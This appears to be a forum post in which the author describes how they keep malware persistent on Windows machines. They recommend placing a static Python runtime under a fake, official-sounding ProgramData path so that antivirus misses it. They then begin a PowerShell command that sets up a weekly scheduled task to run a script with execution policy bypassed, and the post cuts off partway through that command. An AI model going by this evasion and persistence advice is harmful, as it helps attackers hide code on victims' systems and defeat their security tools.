Re persistence, I've never liked the "super stealthy" methods I see out there. Every once in a while there's a really nice one that actually does bypass things. But then it gets attention and is mitigated
or gets overwritten when you infect that obscure DLL and the user updates the file. In my experience, KEEP IT SIMPLE. I like python. It's not an executable file, you can put a static python executable on a machine
and absolutely no AV is going to pick it up (hell you can throw whole folders on there if you don't want to use a static .exe). Name it like C:\ProgramData\Win32runtime\dlls\annoyingly\long\official\seeming\path\<ALL THE PYTHONS>
Most "real" reverse engineers and malware writers scoff at this, but hell I've been using this for a decade and it just works.
C:/> powershell.exe -c
"$taskTrigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Friday -At 3am;
$taskAction = New-ScheduledTaskAction -Execute "PowerShell" -Argument "-NoProfile -ExecutionPolicy Bypass -File 'C:\scripts\ADHealth.ps1' -W